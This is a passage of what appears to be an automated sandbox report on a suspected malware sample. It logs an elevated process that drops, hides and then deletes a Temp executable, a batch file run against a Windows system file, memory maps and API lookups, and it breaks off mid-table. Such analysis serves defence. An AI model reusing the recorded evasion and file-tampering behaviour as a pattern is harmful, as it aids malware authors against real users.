|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #20: vidhs3md.exe
179
0
| Information | Value |
|---|---|
| ID | #20 |
| File Name | c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe |
| Command Line | vIDhS3md.exe -accepteula "alfred.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:32, Reason: Child Process |
| Unmonitor | End Time: 00:04:33, Reason: Self Terminated |
| Monitor Duration | 00:01:01 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe34 |
| Parent PID | 0xe04 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E08
0x
AE4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x0030dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| vidhs3md.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000810000 | 0x00810000 | 0x0081ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000820000 | 0x00820000 | 0x009a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000009b0000 | 0x009b0000 | 0x00b30fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000b40000 | 0x00b40000 | 0x01f3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74380000 | 0x74411fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x745d0000 | 0x745d7fff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x74990000 | 0x74a20fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74a30000 | 0x74a88fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74a90000 | 0x74a99fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74aa0000 | 0x74abdfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x74ad0000 | 0x74c0ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74c10000 | 0x74c53fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x74c60000 | 0x74cdafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x74ce0000 | 0x74d23fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x74eb0000 | 0x74f6dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x74f70000 | 0x75129fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75220000 | 0x7524afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x752b0000 | 0x752bbfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x752c0000 | 0x7667efff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x76800000 | 0x76cdcfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x76da0000 | 0x76ebffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x770b0000 | 0x770f2fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x77100000 | 0x7710efff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x771d0000 | 0x7725cfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x772c0000 | 0x7736bfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77370000 | 0x774bcfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| sysmain.sdb | 0x7fe40000 | 0x7feacfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ffaf7a0ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (11)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 225280 |
|
1 | |
| Write | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | size = 1168 |
|
1 | |
| Delete | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | - |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe | os_pid = 0xa54, show_window = SW_HIDE |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75130000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x74c60000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x74eb0000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77370000 |
|
1 | |
| Load | USER32.dll | base_address = 0x74ad0000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x745d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x751560c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75156110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x751487e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75155f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75154a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75155fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7514a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7514c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75156300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75149a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x751561b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7514fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x779e4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75149a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x751479b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7514fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x751492b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7514a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75156180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75153a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75148cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75155f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75142af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x751478f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75142db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75142da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75147a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7514a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75149660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7514a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7514a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x751487c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75148840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75147940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75149560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x751569c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75156390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x75171c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x751568e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75156920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75156540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x779d5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x779d5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x751726a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x779cda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x779ef190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x779ea200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x751574f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75149fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75142d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x751475a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x751425e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75156870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x751568c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75156900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75149700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75141b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x779f2570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75147920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x779e9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x751562a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75156590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75156860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75149680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x751564a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7514a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x751728e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7514a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75156020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x751477b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7514fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75149a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75141ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75141da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75149930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7514a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75148770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7514fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75149fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75147910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75149a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75142dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75141d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75142b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7514a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7514a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x779cbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x751564f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x74c7ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x74c7fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x74c795e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x74c80680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x74c7ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x74c7f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x74c7ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x74c7ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x74c7f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x74c806c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x74c7efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x74c7f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x74ebc6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x7741ee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x773f55a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x773f57e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x773f9590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x749c1080 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x7741fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x74ae38f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x74afb6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x74afb430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x74ae7740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x74af74e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x74afefa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x74b04ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x74af4580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x74af1540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x745d1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x745d1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x745d1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7514a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7514f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75147580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75149910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75156030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75155f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75155ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7514a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7514a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x779c40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x779bd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x779becf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75155720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x779be140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x779beb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x779f9990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x779f5540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x779e9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7514a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x75170a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74e60790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7514f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7514fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x75171030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7514a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x751714b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7514a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x751716f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75149970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74de3c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75148710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x751496e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-10-03 03:07:14 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #21: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #21 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\vRnqNMBW.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:33, Reason: Child Process |
| Unmonitor | End Time: 00:04:32, Reason: Self Terminated |
| Monitor Duration | 00:00:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x578 |
| Parent PID | 0xbd0 (c:\users\ciihmnxmn6ps\desktop\current_dirnwovkcyl.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E00
0x
94C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000000c0000 | 0x000c0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x000d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x000e3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000f0000 | 0x000f0000 | 0x00103fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00253fff | Pagefile Backed Memory | r |
|
|
|
- |
